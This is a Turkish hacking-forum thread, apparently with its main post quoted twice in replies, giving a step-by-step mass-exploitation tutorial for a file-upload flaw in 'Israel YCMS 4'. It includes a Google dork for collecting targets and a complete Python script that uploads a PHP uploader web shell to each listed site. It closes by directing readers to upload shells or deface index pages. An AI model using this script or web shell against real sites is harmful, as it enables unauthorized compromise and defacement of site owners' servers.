İsrael YCMS 4 - Remote File Upload / Shell Upload

K4TANA

Üye
11 May 2022
60
24
:]
812441-200.png

wabout.png



Merhaba Değerli Türk Hack Team Üyeleri
Bu Konumuzda İsrael YCMS 4 Webapps'ta Remote File Upload Zafiyetini İnceleyeceğiz!


YNY5Ak.png


[+] Hedef Toplama


Dork: intext:נבנה ע"י לק"י בניית אתרים


Öncelikle Dorkumuzu Taratıp Siteleri Topluyorum

bs3gutc.png


Ardından Topladığım Siteleri 'domains.txt' Diye Kaydediyorum.

c075jvj.png

YNY5Ak.png


[+] Exploit İle Zafiyeti Sömürme


Python:
import requests # type: ignore
import re
from colorama import *
import os
if os.name == 'nt':
    os.system('cls')
else:
    os.system('clear')
init()
code_up = """
<!DOCTYPE html>
<html>
<head>
<title>1933-SS</title>
<style>
body {
background-color: black;
text-align: center;
}
h1 {
color: red;
}
.uploaded {
color: green;
}
</style>
</head>
<body>
<h1>1933-ss cyber team</h1>
<form enctype='multipart/form-data' action='' method='POST'>
<input type='file' name='uploaded_file'></input>
<input type='submit' value='Upload'></input>
</form>
</body>
</html>
<?php
if (!empty($_FILES['uploaded_file'])) {
$upload_dir = './'; // Define the directory where you want to save the uploaded files
$file_name = basename($_FILES['uploaded_file']['name']);
$file_path = $upload_dir . $file_name;
if (move_uploaded_file($_FILES['uploaded_file']['tmp_name'], $file_path)) {
echo '<span class="uploaded">The file ' . $file_name . ' has been uploaded.</span>';
} else {
echo '<h1>There was an error uploading the file, please try again.</h1>';
}
}
?>
"""
banner = Fore.RED +"""

                           ) (   (       ) (     
   (                    ( /( )\ ))\ ) ( /( )\ )  *   )
   )\  (   (  (     (   )\()|()/(()/( )\()|()/(` )  /(
(((_) )\  )\ )\    )\ ((_)\ /(_))(_)|(_)\ /(_))( )(_))
)\___((_)((_|(_)  ((_)__((_|_))(_))   ((_|_)) (_(_())
((/ __\ \ / /| __| | __\ \/ / _ \ |   / _ \_ _||_   _|
| (__ \ V / | _|  | _| >  <|  _/ |__| (_) | |   | |
  \___| \_/  |___| |___/_/\_\_| |____|\___/___|  |_|
                                                 
"""
banner2 = "\nAuthor :" + Fore.RED +""" @obttht"""
print(banner+banner2+Fore.WHITE)
websites = input("\nWebsite List: ")
websites = open(websites,"r").read().split("\n")
for url in websites:
    try:
        value = "yadmin/apps/browser.php?op=gallery&CKEditor=page-content&CKEditorFuncNum=1&langCode=en"
        upload_url = url+'/yadmin/apps/browser.php?op=upload&type=other&id=*'
        uploader = {'upload-to-gallery[]': ('ss.php',code_up)}
        response = requests.post(upload_url, files=uploader , timeout=3)
    except:
        pass
    try:
        response = requests.get(url+value,timeout=10)
        if response.status_code == 200:
            match = re.search(r'/ss(\d+\.php)', response.text)
            if match:
                value = match.group(1)
                print(Fore.GREEN +url+f"uploads/other/ss{value}")
            else:
                print(Fore.RED+f"Request to {url} failed with status code {response.status_code}"+Fore.WHITE)
    except:
        continue

Exploiti 'exp.py' Diye Kaydediyorum Ve Çalıştırıyorum

ps99lsj.png


Bizden Website List İstiyor '
domains.txt' Diye Kaydettiğimiz Dosyayı List Olarak Belirtiyoruz Ve Enterliyoruz

sTdNEBF.png



Exploit Siteye Uploader'i Başarılı Bir Şekilde Enjekte Etti!



YNY5Ak.png




[+] İndex / Shell Upload



MIRls3q.png



Exploitin Verdiği URL Bizi Uploader'e Yönlendiriyor, Buradan Shell Veya İndex Basıyoruz Ve Görev Tamam!


eimwdl5.png




[-] Title : israel YCMS 4 - Remote File Upload - CSRF / Shell Upload[-] Author : 1933 (TURK TM - SS CYBER)[-] Vendor : https://website.laki.co.il/[-] Category : Webapps[-] Dork : intext:נבנה ע"י לק"י בניית אתרים[-] Date : 20/11/2023

https://cxsecurity.com/issue/WLB-2023110032
guieh9x.png


af8mqjc.gif
elinize sağlık hocam bilgi ve deneyim konuşturmuşsunuz
 

OBT is HeRYerDe

Anka Team
11 Ara 2020
2,670
1,528
24 May 2024
95
18
812441-200.png

wabout.png



Merhaba Değerli Türk Hack Team Üyeleri
Bu Konumuzda İsrael YCMS 4 Webapps'ta Remote File Upload Zafiyetini İnceleyeceğiz!


YNY5Ak.png


[+] Hedef Toplama


Dork: intext:נבנה ע"י לק"י בניית אתרים


Öncelikle Dorkumuzu Taratıp Siteleri Topluyorum

bs3gutc.png


Ardından Topladığım Siteleri 'domains.txt' Diye Kaydediyorum.

c075jvj.png

YNY5Ak.png


[+] Exploit İle Zafiyeti Sömürme


Python:
import requests # type: ignore
import re
from colorama import *
import os
if os.name == 'nt':
    os.system('cls')
else:
    os.system('clear')
init()
code_up = """
<!DOCTYPE html>
<html>
<head>
<title>1933-SS</title>
<style>
body {
background-color: black;
text-align: center;
}
h1 {
color: red;
}
.uploaded {
color: green;
}
</style>
</head>
<body>
<h1>1933-ss cyber team</h1>
<form enctype='multipart/form-data' action='' method='POST'>
<input type='file' name='uploaded_file'></input>
<input type='submit' value='Upload'></input>
</form>
</body>
</html>
<?php
if (!empty($_FILES['uploaded_file'])) {
$upload_dir = './'; // Define the directory where you want to save the uploaded files
$file_name = basename($_FILES['uploaded_file']['name']);
$file_path = $upload_dir . $file_name;
if (move_uploaded_file($_FILES['uploaded_file']['tmp_name'], $file_path)) {
echo '<span class="uploaded">The file ' . $file_name . ' has been uploaded.</span>';
} else {
echo '<h1>There was an error uploading the file, please try again.</h1>';
}
}
?>
"""
banner = Fore.RED +"""

                           ) (   (       ) (     
   (                    ( /( )\ ))\ ) ( /( )\ )  *   )
   )\  (   (  (     (   )\()|()/(()/( )\()|()/(` )  /(
(((_) )\  )\ )\    )\ ((_)\ /(_))(_)|(_)\ /(_))( )(_))
)\___((_)((_|(_)  ((_)__((_|_))(_))   ((_|_)) (_(_())
((/ __\ \ / /| __| | __\ \/ / _ \ |   / _ \_ _||_   _|
| (__ \ V / | _|  | _| >  <|  _/ |__| (_) | |   | |
  \___| \_/  |___| |___/_/\_\_| |____|\___/___|  |_|
                                                 
"""
banner2 = "\nAuthor :" + Fore.RED +""" @obttht"""
print(banner+banner2+Fore.WHITE)
websites = input("\nWebsite List: ")
websites = open(websites,"r").read().split("\n")
for url in websites:
    try:
        value = "yadmin/apps/browser.php?op=gallery&CKEditor=page-content&CKEditorFuncNum=1&langCode=en"
        upload_url = url+'/yadmin/apps/browser.php?op=upload&type=other&id=*'
        uploader = {'upload-to-gallery[]': ('ss.php',code_up)}
        response = requests.post(upload_url, files=uploader , timeout=3)
    except:
        pass
    try:
        response = requests.get(url+value,timeout=10)
        if response.status_code == 200:
            match = re.search(r'/ss(\d+\.php)', response.text)
            if match:
                value = match.group(1)
                print(Fore.GREEN +url+f"uploads/other/ss{value}")
            else:
                print(Fore.RED+f"Request to {url} failed with status code {response.status_code}"+Fore.WHITE)
    except:
        continue

Exploiti 'exp.py' Diye Kaydediyorum Ve Çalıştırıyorum

ps99lsj.png


Bizden Website List İstiyor '
domains.txt' Diye Kaydettiğimiz Dosyayı List Olarak Belirtiyoruz Ve Enterliyoruz

sTdNEBF.png



Exploit Siteye Uploader'i Başarılı Bir Şekilde Enjekte Etti!



YNY5Ak.png




[+] İndex / Shell Upload



MIRls3q.png



Exploitin Verdiği URL Bizi Uploader'e Yönlendiriyor, Buradan Shell Veya İndex Basıyoruz Ve Görev Tamam!


eimwdl5.png




[-] Title : israel YCMS 4 - Remote File Upload - CSRF / Shell Upload[-] Author : 1933 (TURK TM - SS CYBER)[-] Vendor : https://website.laki.co.il/[-] Category : Webapps[-] Dork : intext:נבנה ע"י לק"י בניית אתרים[-] Date : 20/11/2023

https://cxsecurity.com/issue/WLB-2023110032
guieh9x.png


af8mqjc.gif
Çok saolun hocam
 

OBT is HeRYerDe

Anka Team
11 Ara 2020
2,670
1,528
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.